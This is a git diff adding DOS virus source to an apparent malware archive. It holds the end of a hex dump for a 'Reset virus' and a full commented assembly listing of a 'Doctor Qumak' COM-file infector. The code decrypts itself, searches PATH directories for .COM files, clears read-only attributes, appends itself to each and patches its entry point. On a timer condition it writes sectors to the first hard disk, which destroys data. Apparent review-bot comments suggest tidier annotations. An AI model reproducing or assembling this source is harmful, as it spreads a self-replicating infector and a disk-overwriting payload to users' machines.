B4 40 B9-88 02 8B D6 81 EA F9 01 ......@......... +114E:02B0 CD 21 72 1F 3D 88 02 75-1A B8 00 42 B9 00 00 BA .!r.=..u...B.... +114E:02C0 00 00 CD 21 72 0D B4 40-B9 03 00 8B D6 81 C2 0D ...!r..@........ +114E:02D0 00 CD 21 8B 94 06 00 8B-8C 04 00 81 E1 E0 FF 81 ..!............. +114E:02E0 C9 1F 00 B8 01 57 CD 21-B4 3E CD 21 B8 01 43 8B .....W.!.>.!..C. +114E:02F0 8C 08 00 BA 1F 00 90 03-D6 CD 21 1E B4 1A 8B 94 ..........!..... 
+114E:0300 00 00 8E 9C 02 00 CD 21-1F 59 33 C0 33 DB 33 D2 .......!.Y3.3.3. +114E:0310 33 F6 BF 00 01 57 33 FF-C2 FF FF 80 00 46 0D 20 3....W3......F. +114E:0320 01 21 00 20 00 EB 15 90-E9 1F 00 2A 2E 43 4F 4D .!. .......*.COM +114E:0330 00 28 00 47 03 50 41 54-48 3D 52 45 53 45 54 2E .(.G.PATH=RESET. +114E:0340 43 4F 4D 00 00 00 00 4D-00 44 49 54 2E 43 4F 4D COM....M.DIT.COM +114E:0350 00 00 20 20 20 20 20 20-20 20 20 20 20 20 20 20 .. +114E:0360 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20 +114E:0370 20 20 20 20 20 20 20 20-20 20 01 3F 3F 3F 3F 3F .????? +114E:0380 3F 3F 3F 43 4F 4D 03 01-00 00 00 2E 8B 26 68 20 ???COM.......&h +114E:0390 20 01 21 00 22 00 00 00-52 45 53 45 54 2E 43 4F .!."...RESET.CO +114E:03A0 4D 00 00 4D 00 EA F0 FF-00 F0 16 7C 14 M..M.......|. + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.v_dq1028.asm b/MSDOS/Virus.MSDOS.Unknown.v_dq1028.asm new file mode 100644 index 00000000..8ed5643a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.v_dq1028.asm 
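Review bot: The header line `Reset virus. Size 682 byte Hex: 02ac byte` does not agree with itself: 02ACh is 684, not 682, and the only length the code itself uses is `MOV CX,0288` at 02A7 (648 bytes written when the virus appends itself), so a reader cannot tell which quantity the header means; a short clarification such as `; NOTE: 02ACh = 684; the code writes 0288h (648) bytes of itself at 02A7 - confirm which size is meant` would resolve it. The listing body also appears byte-identical to the listing that precedes it in this patch (the hunk ending at the `\ No newline at end of file` before this file's `diff --git` header), so if both are the same analysis filed under two names, one copy should be dropped or the header should say which sample each belongs to. The file name `v_dos625` matches neither the title "Reset virus" nor the `RESET.COM` strings visible in the dump at 0330-0340 and 0398-03A0, so a one-line provenance note at the top (sample name, where the listing came from, which DEBUG session produced the 114E segment) would help anyone correlating this listing with the archive entry it documents.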
@@ -0,0 +1,533 @@ +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + org 100h + +start: jmp l_02F3 ;0100 E9 01F0 + db 6Bh,73h,0CAh,0Eh ;contamination ptr ;0103 6B 73 CA 0E + + + org 2F3h +;---------------------------------------------- +l_02F3: push cx ;02F3 51 + mov dx,offset d_0683 ;coded virus part addr ;02F4 BA 0683 + nop ;02F7 90 + + ;<--------- encoding + push dx ;02F8 52 + pop bx ;02F9 5B + mov cx,0F9h ;coded block length ;02FA B9 00F9 + mov si,dx ;02FD 8B F2 + dec si ;02FF 4E + mov dl,[si] ;0300 8A 14 + inc si ;0302 46 +l_0303: mov al,[bx] ;encoding loop ;0303 8A 07 + xor al,dl ;0305 32 C2 + nop ;0307 90 + mov [bx],al ;0308 88 07 + inc bx ;030A 43 + loop l_0303 ;030B E2 F6 + mov dx,si ;030D 8B D6 + + ;<----- restore changed bytes + xor ax,ax ;030F 33 C0 + xor bx,bx ;0311 33 DB + cld ;0313 FC + mov si,dx ;0314 8B F2 + add si,0ADh ;x_00AD ;saved bytes address ;0316 .81 C6 00AD + mov di,100h ;target address ;031A .BF 0100 + mov cx,7 ;changed bytes ;031D B9 0007 + nop ;0320 90 + rep movsb ;0321 F3/ A4 + + mov si,dx ;0323 8B F2 + mov byte ptr ds:[si+0F8h],0 ;x_00F8 ;0325 C6 84 00F8 00 + mov ah,30h ;get DOS version nr ;032A B4 30 + int 21h ;032C CD 21 + cmp al,0 ;major version ;032E 3C 00 + nop ;0330 90 + jnz l_0335 ;0331 75 02 + nop ;0333 90 + nop ;0334 90 +l_0335: mov bp,0BFh ;x_00BF ;0335 BD 00BF + add bp,si ;0338 03 EE + mov byte ptr ds:[bp],0 ;033A 3E: C6 46 00 00 + push es ;033F 06 + nop ;0340 90 + mov ah,2Fh ;get DTA ptr into es:bx ;0341 B4 2F + int 21h ;0343 CD 21 + mov [si],bx ;x_0000 ;0345 89 1C + mov [si+2],es ;x_0002 ;0347 8C 44 02 + pop es ;034A 07 + mov dx,5Fh ;x_005F ;034B .BA 005F + add dx,si ;034E 03 D6 + mov ah,1Ah ;set DTA to ds:dx ;0350 B4 1A + int 21h ;0352 CD 21 + push es ;0354 06 + push si ;0355 56 + mov es,ds:[2Ch] ;environment segment ;0356 8E 06 002C + mov di,0 ;035A .BF 0000 +l_035D: pop si ;035D 5E + push si ;035E 56 + add si,1Ah ;x_001A ('PATH=') ;035F 83 C6 1A + lodsb ;0362 AC + mov cx,8000h ;0363 B9 8000 + repne scasb ;0366 
F2/ AE + mov cx,4 ;0368 B9 0004 +l_036B: lodsb ;036B AC + scasb ;036C AE + jnz l_035D ;036D 75 EE + loop l_036B ;036F E2 FA + + ;<----- Environment variable 'PATH=' + pop si ;0371 5E + pop es ;0372 07 + mov [si+16h],di ;x_0016 ;0373 89 7C 16 + mov di,si ;0376 8B FE + add di,1Fh ;x_001F = work buffer ;0378 83 C7 1F + mov bx,si ;037B 8B DE + add si,1Fh ;x_001F = work buffer ;037D 83 C6 1F + mov di,si ;0380 8B FE + jmp short l_03CE ;0382 EB 4A + + ;<----- next directory +l_0384: cmp word ptr [si+16h],0 ;x_0016 = ptr in env ;0384 83 7C 16 00 + jne l_0392 ;-> not all in 'PATH' ;0388 75 08 + mov byte ptr ds:[si+0F8h],1 ;<- end of 'PATH' ;038A C6 84 00F8 01 + jmp l_04E9 ;038F E9 0157 + +l_0392: push ds ;0392 1E + push si ;0393 56 + mov bp,0BFh ;x_00BF ;0394 .BD 00BF + add bp,si ;0397 03 EE + mov ds,es:[02Ch] ;environment segment ;0399 26: 8E 1E 002C + mov di,si ;039E 8B FE + mov si,es:[di+16h] ;ptr in environment ;03A0 26: 8B 75 16 + add di,1Fh ;pattern address ;03A4 83 C7 1F +l_03A7: lodsb ;03A7 AC + cmp al,';' ;directory delimiter ;03A8 3C 3B + je l_03BB ;03AA 74 0F + cmp al,0 ;03AC 3C 00 + je l_03B8 ;position delimiter ;03AE 74 08 + mov es:[bp],al ;03B0 26: 88 46 00 + inc bp ;03B4 45 + stosb ;03B5 AA + jmp short l_03A7 ;03B6 EB EF + +l_03B8: mov si,0 ;end of path ptr ;03B8 .BE 0000 +l_03BB: pop bx ;03BB 5B + pop ds ;03BC 1F + mov [bx+16h],si ;save current ptr ;03BD 89 77 16 + cmp byte ptr [di-1],'\' ;last path char ;03C0 80 7D FF 5C + je l_03CE ;-> o.k. 
;03C4 74 08 + mov al,'\' ;<- add dir delimiter ;03C6 B0 5C + mov es:[bp],al ;03C8 26: 88 46 00 + inc bp ;03CC 45 + stosb ;03CD AA + +l_03CE: mov byte ptr es:[bp],0 ;x_00BF ;03CE 26: C6 46 00 00 + mov bp,0 ;03D3 BD 0000 + mov [bx+18h],di ;[x_0018]:=x_001F ;03D6 89 7F 18 + mov si,bx ;offset d_0683 ;03D9 8B F3 + add si,10h ;x_0010 ('*.COM') ;03DB 83 C6 10 + mov cx,6 ;03DE B9 0006 + rep movsb ;03E1 F3/ A4 + mov si,bx ;03E3 8B F3 + mov ah,4Eh ;find 1st filenam match @ds:dx ;03E5 B4 4E + mov dx,01Fh ;x_001F (file pattern) ;03E7 .BA 001F + add dx,si ;03EA 03 D6 + mov cx,3 ;attribute pattern ;03EC B9 0003 + int 21h ;03EF CD 21 + jmp short l_0429 ;03F1 EB 36 + + ;<----- next file in the same directory +l_03F3: mov bp,0BFh ;file name address ;03F3 .BD 00BF + add bp,si ;03F6 03 EE + push bp ;03F8 55 + mov ax,0 ;03F9 B8 0000 + dec bp ;03FC 4D +l_03FD: inc bp ;03FD 45 + cmp byte ptr ds:[bp],'\' ;begin of file name ;03FE 3E: 80 7E 00 5C + jne l_0407 ;0403 75 02 + mov ax,bp ;possibly here ;0405 8B C5 +l_0407: cmp byte ptr ds:[bp],0 ;end of filename ? ;0407 3E: 80 7E 00 00 + jne l_03FD ;-> not now ;040C 75 EF + cmp ax,0 ;have been any dir ? 
;040E 3D 0000 + pop bp ;0411 5D + jnz l_041B ;-> yes ;0412 75 07 + mov byte ptr ds:[bp],0 ;<- we are in the root ;0414 3E: C6 46 00 00 + jmp short l_0425 ;0419 EB 0A + +l_041B: mov bp,ax ;end of path address ;041B 8B E8 + mov byte ptr ds:[bp+1],0 ;end ptr ;041D 3E: C6 46 01 00 + mov bp,0 ;0422 BD 0000 +l_0425: mov ah,4Fh ;find next file match ;0425 B4 4F + int 21h ;0427 CD 21 + + +l_0429: jnc l_042E ;0429 73 03 + jmp l_0384 ;-> end of files in current dir ;042B E9 FF56 + +l_042E: mov bp,0BFh ;x_00BF = victim name ;042E .BD 00BF + add bp,si ;0431 03 EE + dec bp ;0433 4D +l_0434: inc bp ;0434 45 + cmp byte ptr ds:[bp],0 ;find end of path ;0435 3E: 80 7E 00 00 + jne l_0434 ;043A 75 F8 + mov di,bp ;043C 8B FD + mov bp,0 ;043E BD 0000 + push si ;0441 56 + add si,7Dh ;x_007D - DTA-file name ;0442 83 C6 7D +l_0445: lodsb ;add file name ;0445 AC + stosb ;0446 AA + cmp al,0 ;0447 3C 00 + jne l_0445 ;0449 75 FA + pop si ;044B 5E + mov dx,si ;044C 8B D6 + add dx,0BFh ;x_00BF = file name ;044E .81 C2 00BF + mov ax,3D00h ;open file R/O ;0452 B8 3D00 + int 21h ;0455 CD 21 + jnc l_045C ;0457 73 03 + jmp l_0384 ;-> error, next dir ;0459 E9 FF28 + +l_045C: mov bx,ax ;file handle ;045C 8B D8 + mov dx,0B8h ;x_00B8 = file buffer ;045E .BA 00B8 + add dx,si ;0461 03 D6 + mov cx,7 ;bytes to read ;0463 B9 0007 + mov ah,3Fh ;read handle ;0466 B4 3F + int 21h ;0468 CD 21 + mov ah,3Eh ;close handle ;046A B4 3E + int 21h ;046C CD 21 + mov di,0BBh ;4,5,6,7 bytes from file;046E .BF 00BB + add di,si ;0471 03 FE + mov bx,0B4h ;contam. 
ptr pattern ;0473 .BB 00B4 + add bx,si ;0476 03 DE + mov ax,[di] ;0478 8B 05 + cmp ax,[bx] ;047A 3B 07 + jne l_0489 ;-> not infected yet ;047C 75 0B + mov ax,[di+2] ;047E 8B 45 02 + cmp ax,[bx+2] ;0481 3B 47 02 + jne l_0489 ;-> not infected yet ;0484 75 03 +l_0486: jmp l_03F3 ;-> allready infected ;0486 E9 FF6A + +l_0489: cmp word ptr [si+79h],0FA00h ;file size ;0489 81 7C 79 FA00 + nop ;048E 90 + ja l_0486 ;-> to big ;048F 77 F5 + cmp word ptr [si+79h],0Ah ;file size ;0491 83 7C 79 0A + jb l_0486 ;-> to small ;0495 72 EF + mov di,[si+18h] ;678Bh ?? ;0497 8B 7C 18 + push si ;049A 56 + add si,7Dh ;DTA - file name ;049B 83 C6 7D +l_049E: lodsb ;049E AC + stosb ;049F AA + cmp al,0 ;04A0 3C 00 + jne l_049E ;04A2 75 FA + pop si ;04A4 5E + mov ax,4300h ;get file attrb, nam@ds:dx ;04A5 B8 4300 + mov dx,01Fh ;file name ;04A8 .BA 001F + push si ;04AB 56 + pop si ;04AC 5E + add dx,si ;04AD 03 D6 + int 21h ;04AF CD 21 + mov [si+8],cx ;save oryginal attributes ;04B1 89 4C 08 + mov ax,4301h ;set file attrb, nam@ds:dx ;04B4 B8 4301 + and cl,0FEh ;clear R/O ;04B7 80 E1 FE + mov dx,01Fh ;04BA .BA 001F + add dx,si ;04BD 03 D6 + int 21h ;04BF CD 21 + + mov ax,3D02h ;open file R/W ;04C1 B8 3D02 + mov dx,01Fh ;file name address ;04C4 .BA 001F + add dx,si ;04C7 03 D6 + int 21h ;04C9 CD 21 + jnc l_04D0 ;-> O.K. 
;04CB 73 03 + jmp l_0638 ;-> error ;04CD E9 0168 +l_04D0: mov bx,ax ;file handle ;04D0 8B D8 + mov ax,5700h ;get file date & time ;04D2 B8 5700 + int 21h ; DOS Services ah=function 57h ;04D5 CD 21 + mov [si+4],cx ;04D7 89 4C 04 + mov [si+6],dx ;04DA 89 54 06 + mov ah,2Ch ;get time ;04DD B4 2C + int 21h ;04DF CD 21 + and dh,7 ;seconds ;04E1 80 E6 07 + jz l_04E9 ;04E4 74 03 + jmp l_0572 ;-> contamine ;04E6 E9 0089 + + ;<- end of 'PATH' members +l_04E9: push bx ;04E9 53 + push si ;04EA 56 + mov ah,8 ;read parameters for drive dl ;04EB B4 08 + mov dl,80h ;HDD 0 ;04ED B2 80 + int 13h ;04EF CD 13 + cmp dl,0 ;nr of fixed disks ;04F1 80 FA 00 + je l_0562 ;-> no HDD ;04F4 74 6C + mov al,cl ;04F6 8A C1 + and al,3Fh ; '?' ;04F8 24 3F + mov ds:[si+0F4h],al ;04FA 88 84 00F4 + mov al,ch ;04FE 8A C5 + mov ah,cl ;0500 8A E1 + and ah,0C0h ;0502 80 E4 C0 + mov cl,6 ;0505 B1 06 + shr ah,cl ;0507 D2 EC + mov ds:[si+0F1h],ax ;0509 89 84 00F1 + mov ds:[si+0F3h],dh ;050D 88 B4 00F3 +l_0511: mov ah,2Ch ; ',' ;0511 B4 2C + int 21h ; DOS Services ah=function 2Ch ;0513 CD 21 + ; get time, cx=hrs/min, dh=sec + shr dl,1 ;0515 D0 EA + shr dl,1 ;0517 D0 EA + and dl,7 ;0519 80 E2 07 + cmp dl,ds:[si+0F3h] ;051C 3A 94 00F3 + ja l_0511 ;0520 77 EF + mov ds:[si+0F7h],dl ;0522 88 94 00F7 + push ds ;0526 1E + mov ax,0 ;0527 B8 0000 + mov ds,ax ;052A 8E D8 + mov bx,046Ch ;052C .BB 046C + mov ax,[bx] ;052F 8B 07 + mov dx,[bx+2] ;0531 8B 57 02 + pop ds ;0534 1F + div word ptr ds:[si+0F1h] ;0535 F7 B4 00F1 +l_0539: cmp dx,ds:[si+0F1h] ;0539 3B 94 00F1 + jbe l_0543 ;053D 76 04 + shr dx,1 ;053F D1 EA + jmp short l_0539 ;0541 EB F6 +l_0543: mov ds:[si+0F5h],dx ;0543 89 94 00F5 + mov ax,dx ;0547 8B C2 + mov dl,80h ;0549 B2 80 + mov dh,ds:[si+0F7h] ;054B 8A B4 00F7 + mov ch,al ;054F 8A E8 + mov cl,6 ;0551 B1 06 + shl ah,cl ;0553 D2 E4 + mov cl,ah ;0555 8A CC + mov ah,3 ;0557 B4 03 + or cl,1 ;0559 80 C9 01 + mov al,ds:[si+0F4h] ;055C 8A 84 00F4 + int 13h ; Disk dl=drive 0 ah=func 03h ;0560 CD 13 + ; write 
sectors from mem es:bx + + ;<----- +l_0562: pop si ;0562 5E + pop bx ;0563 5B + cmp byte ptr ds:[si+0F8h],0 ;x_00F8 ;0564 80 BC 00F8 00 + je l_056E ;-> O.K. ;0569 74 03 + jmp l_0647 ;-> no 'PATH' ;056B E9 00D9 + +l_056E: jmp l_0628 ;056E E9 00B7 + nop ;0571 90 + + ;<----- contamine file +l_0572: mov ah,3Fh ; '?' ;0572 B4 3F + mov cx,7 ;0574 B9 0007 + mov dx,0ADh ;0577 .BA 00AD + add dx,si ;057A 03 D6 + int 21h ; DOS Services ah=function 3Fh ;057C CD 21 + ; read file, cx=bytes, to ds:dx + jnc l_0583 ;057E 73 03 + jmp l_0628 ;0580 E9 00A5 +l_0583: cmp ax,7 ;0583 3D 0007 + je l_058B ;0586 74 03 + jmp l_0628 ;0588 E9 009D +l_058B: mov ax,4202h ;058B B8 4202 + mov cx,0 ;058E B9 0000 + mov dx,0 ;0591 BA 0000 + int 21h ; DOS Services ah=function 42h ;0594 CD 21 + ; move file ptr, cx,dx=offset + jnc l_059B ;0596 73 03 + jmp l_0628 ;0598 E9 008D +l_059B: mov cx,ax ;059B 8B C8 + sub ax,3 ;059D 2D 0003 + mov [si+0Eh],ax ;05A0 89 44 0E + add cx,490h ;05A3 81 C1 0490 + mov di,si ;05A7 8B FE + sub di,38Eh ;05A9 81 EF 038E + mov [di],cx ;05AD 89 0D + mov ah,40h ; '@' ;05AF B4 40 + mov cx,489h ;05B1 B9 0489 + mov dx,si ;05B4 8B D6 + sub dx,390h ;05B6 81 EA 0390 + push dx ;05BA 52 + push cx ;05BB 51 + push bx ;05BC 53 + push ax ;05BD 50 + mov ah,2Ch ; ',' ;05BE B4 2C + int 21h ; DOS Services ah=function 2Ch ;05C0 CD 21 + ; get time, cx=hrs/min, dh=sec + mov dl,cl ;05C2 8A D1 + add dl,dh ;05C4 02 D6 + add dl,82h ;05C6 80 C2 82 + mov [si-1],dl ;05C9 88 54 FF + mov bx,si ;05CC 8B DE + mov cx,0F9h ;05CE B9 00F9 + +l_05D1: mov al,[bx] ;05D1 8A 07 + xor al,dl ;05D3 32 C2 + mov [bx],al ;05D5 88 07 + inc bx ;05D7 43 + loop l_05D1 ;05D8 E2 F7 + + pop ax ;05DA 58 + pop bx ;05DB 5B + pop cx ;05DC 59 + pop dx ;05DD 5A + int 21h ; DOS Services ah=function 40h ;05DE CD 21 + ; write file cx=bytes, to ds:dx + push dx ;05E0 52 + push cx ;05E1 51 + push bx ;05E2 53 + push ax ;05E3 50 + mov bx,si ;05E4 8B DE + mov cx,0F9h ;05E6 B9 00F9 + mov dl,[si-1] ;05E9 8A 54 FF + +l_05EC: mov al,[bx] ;05EC 8A 07 
+ xor al,dl ;05EE 32 C2 + nop ;05F0 90 + mov [bx],al ;05F1 88 07 + inc bx ;05F3 43 + loop l_05EC ;05F4 E2 F6 + + pop ax ;05F6 58 + pop bx ;05F7 5B + pop cx ;05F8 59 + pop dx ;05F9 5A + jc l_0628 ;05FA 72 2C + cmp ax,489h ;05FC 3D 0489 + jne l_0628 ;05FF 75 27 + mov ax,4200h ;0601 B8 4200 + nop ;0604 90 + mov cx,0 ;0605 B9 0000 + mov dx,0 ;0608 BA 0000 + int 21h ; DOS Services ah=function 42h ;060B CD 21 + ; move file ptr, cx,dx=offset + jc l_0628 ;060D 72 19 + mov ah,40h ; '@' ;060F B4 40 + mov cx,3 ;0611 B9 0003 + mov dx,si ;0614 8B D6 + add dx,0Dh ;0616 83 C2 0D + int 21h ; DOS Services ah=function 40h ;0619 CD 21 + ; write file cx=bytes, to ds:dx + mov cx,4 ;061B B9 0004 + mov dx,si ;061E 8B D6 + add dx,0B4h ;0620 .81 C2 00B4 + mov ah,40h ; '@' ;0624 B4 40 + int 21h ; DOS Services ah=function 40h ;0626 CD 21 + ; write file cx=bytes, to ds:dx +l_0628: mov dx,[si+6] ;0628 8B 54 06 + nop ;062B 90 + mov cx,[si+4] ;062C 8B 4C 04 + mov ax,5701h ;062F B8 5701 + int 21h ; DOS Services ah=function 57h ;0632 CD 21 + ; get/set file date & time + mov ah,3Eh ; '>' ;0634 B4 3E + int 21h ; DOS Services ah=function 3Eh ;0636 CD 21 + ; close file, bx=file handle +l_0638: mov ax,4301h ;0638 B8 4301 + mov cx,[si+8] ;063B 8B 4C 08 + mov dx,01Fh ;063E .BA 001F + nop ;0641 90 + add dx,si ;0642 03 D6 + nop ;0644 90 + int 21h ; DOS Services ah=function 43h ;0645 CD 21 + ; get/set file attrb, nam@ds:dx + + ;<----- EXIT +l_0647: push ds ;0647 1E + mov ah,1Ah ;set DTA to ds:dx ;0648 B4 1A + mov dx,[si] ;saved victim DTA ;064A 8B 14 + mov ds,[si+2] ;064C 8E 5C 02 + int 21h ;064F CD 21 + pop ds ;restore registers ;0651 1F + pop cx ;0652 59 + xor ax,ax ;0653 33 C0 + xor bx,bx ;0655 33 DB + xor dx,dx ;0657 33 D2 + xor si,si ;0659 33 F6 + nop ;065B 90 + mov di,100h ;Victim entry point ;065C .BF 0100 + nop ;065F 90 + push di ;0660 57 + nop ;0661 90 + xor di,di ;0662 33 FF + retn ;-> run victim ;0664 C3 + + db 1,2,3 ;0665 01 02 03 + db 1,2,3 ;0668 01 02 03 + db 4,5,6 ;066B 04 05 06 + + db 
0Dh,0Ah ;066E 0D 0A + db '(C) DOCTOR QUMAK' ;0670 28 43 29 20 44 4F 43 54 + ;0678 4F 52 20 51 55 4D 41 4B + db 0Dh,0Ah ;0680 0D 0A + + db 0B6h ;klucz kodowania ;0682 B6 + +d_0683 label byte + +x_0000 dw 0080h ;victim DTA offset ;0000 80 00 +x_0002 dw 10ABh ;victim DTA segment ;0003 AB 10 +x_0004 dw 9BEFh ;victim time stamp ;0004 EF 9B +x_0006 dw 1587h ;victim date stamp ;0006 87 15 +x_0008 dw 0020h ;victim attribute ;0008 20 00 + + db 0E9h,0F9h,00h ;000A E9 F9 00 + db 0E9h,0F0h,01h ;000D E9 F0 01 + +x_0010 db '*.COM',0 ;0010 2A 2E 43 4F 4D 00 +x_0016 dw 002Ah ;ptr in environment ;0016 2A 00 + +x_0018 dw 678Bh ;??? ;0018 8B 67 + +x_001A db 'PATH=' ;001A 50 41 54 48 3D +x_001F db 'CS.COM',0 ;001F 43 53 2E 43 4F 4D 00 + db '.COM', 0 ;0026 2E 43 4F 4D 00 + db 'T.COM', 0 ;002B 54 2E 43 4F 4D 00 + db 'OM',0 ;0031 4F 4D 00 + db 43 dup (' ') ;0034 002B[20] + + ;<----- virus DTA +x_005F db 04h ;005F 04 + db '????????COM' ;0060 0008[3F] 43 4F 4D + db 03h,14h,00h,51h,01h,00h,00h,00h,00h ;006B 03 14 00 51 01 00 00 00 00 +x_0074 db 20h ;attribute found ;0074 20 +x_0075 dw 9BEFh ;time stamp ;0075 EF 9B +x_0077 dw 1587h ;date stamp ;0077 87 15 +x_0079 dw 01F3h,0 ;file size ;0079 F3 01 00 00 +x_007D db 'CS.COM',0,' COM',0,0 ;file name ;007D 43 53 2E 43 4F 4D 00 20 43 4F 4D 00 00 + + db 0EAh,0F0h ;008A EA F0 + db 0FFh, 00h,0F0h ;008C FF 00 F0 + db 'Hello world from my virus !',0Dh,0Ah,'$' ;008F 48 65 6C 6C 6F 20 + ;0095 77 6F 72 6C 64 20 + ;009B 66 72 6F 6D 20 6D + ;00A1 79 20 76 69 72 75 + ;00A7 73 20 21 0D 0A 24 + ;<----- Saved victim bytes +x_00AD db 0EBh,00h,1Eh,0B8h,00h,00h,50h ;00AD EB 00 1E B8 00 00 50 + + ;contamination pattern +x_00B4 db 6Bh,73h,0CAh,0Eh ;00B4 6B 73 CA 0E + + ;<----- file buffer +x_00B8 db 0EBh,00h,1Eh ;00B8 EB 00 1E +x_00BB db 0B8h,00h,00h,50h ;contam.ptr.here ;00BB B8 00 00 50 + +x_00BF db 'CS.COM',0 ;file name & path ;00BF 43 53 2E 43 4F 4D 00 + db '.COM',0 ;00C6 2E 43 4F 4D 00 + db 'T.COM', 0 ;00CB 54 2E 43 4F 4D 00 + db 'M',0 ;00D1 4D 00 + db ' the 
stuff that should be here' ;00D3 20 74 68 65 20 73 + ;00D9 74 75 66 66 20 74 + ;00DF 68 61 74 20 73 68 + ;00E5 6F 75 6C 64 20 62 + ;00EB 65 20 68 65 72 65 +x_00F1 dw 0 ;00F1 00 00 +x_00F3 db 0 ;00F3 00 +x_00F4 db 0 ;00F4 00 +x_00F5 dw 0 ;00F5 00 00 +x_00F7 db 0 ;00F7 00 +x_00F8 db 0 ;1=no path ;00F8 00 +seg_a ends + + end start + \ No newline at end of file
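Review bot: The data-area annotations at the end of this listing disagree with the code that uses them: `x_0002 dw 10ABh ;victim DTA segment ;0003 AB 10` carries the wrong offset (it sits between `x_0000` and `x_0004`, so `0002`), and `x_0018 dw 678Bh ;???` together with `mov di,[si+18h] ;678Bh ??` at 0497 leaves undocumented a field the code itself explains — l_03CE stores the position in the x_001F work buffer just after the directory part (`mov [bx+18h],di ;[x_0018]:=x_001F`) and l_0489 reloads it as the destination for copying the DTA file name. I would replace both `???` comments with `;ptr into work buffer x_001F past the dir part (set at l_03CE, read at l_0489)` and correct the offset to `;0002 AB 10`. The Polish comment `;klucz kodowania` on the 0B6h byte reads better for an English-language archive as `;XOR key for the block at d_0683 (applied at l_0303 / l_05D1)`, and the misspellings in the annotations (`allready`, `to big`, `to small`, `oryginal`) are worth fixing while the file is being added. Because this is an archived disassembly rather than maintained code, a short header naming the assembler dialect that `segment byte public`/`assume`/`label byte` target and summarising the int 13h fixed-disk sector write reached at 0560 would help an analyst orient in the file.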